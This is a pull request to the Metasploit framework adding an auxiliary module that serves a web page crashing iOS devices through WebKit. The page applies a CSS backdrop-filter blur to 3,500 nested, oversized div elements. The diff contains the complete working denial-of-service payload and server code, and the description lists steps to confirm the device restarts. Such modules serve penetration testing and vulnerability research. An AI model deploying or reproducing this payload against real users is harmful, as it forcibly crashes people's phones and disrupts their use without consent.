### PR TITLE
Add iOS Safari Webkit Blur Denial of Service

### DIFF
--- a/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb
+++ b/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb
@@ -1,0 +1,62 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "iOS Safari Denial of Service with CSS",
+        'Description'    => %q(
+          This module exploits a vulnerability in WebKit on Apple iOS.
+          If successful, the device will restart after viewing the webpage.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'pwnsdx'
+        ],
+        'References'     => [
+          ['URL', 'https://twitter.com/pwnsdx/status/1040944750973595649'],
+          ['URL', 'https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea'],
+        ],
+        'DisclosureDate' => "Sep 15 2018",
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Sending response')
+    html = %|
+<html>
+ <head>
+  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
+  <style>
+    div {
+      backdrop-filter: blur(10px);
+      -webkit-backdrop-filter: blur(10px);
+      width:10000px; height:10000px;
+    }
+  </style>
+ </head>
+ <body>
+|
+    html += "<div>" * 3500
+    html += "</div>" * 3500
+    html += %|
+ </body>
+</html>
+|
+    send_response(cli, html)
+  end
+end

--- a/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb
+++ b/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb
@@ -50,10 +50,7 @@ class MetasploitModule < Msf::Auxiliary
   </style>
  </head>
  <body>
-|
-    html += "<div>" * 3500
-    html += "</div>" * 3500
-    html += %|
+ #{'<div>' * 3500 + '</div>' * 3500}
  </body>
 </html>
 |

--- a/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb
+++ b/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb
@@ -17,11 +17,12 @@ class MetasploitModule < Msf::Auxiliary
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
-          'pwnsdx'
+          'Sabri Haddouche', # twitter.com/pwnsdx
         ],
         'References'     => [
           ['URL', 'https://twitter.com/pwnsdx/status/1040944750973595649'],
           ['URL', 'https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea'],
+          ['URL', 'https://nbulischeck.github.io/apple-safari-crash'],
         ],
         'DisclosureDate' => "Sep 15 2018",
         'Actions'        => [[ 'WebServer' ]],


### PR DESCRIPTION
Add a module that demonstrates a denial of service on Safari Webkit.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur`
- [x] Visit the url on an iOS device
- [x] **Verify** the device re-springs

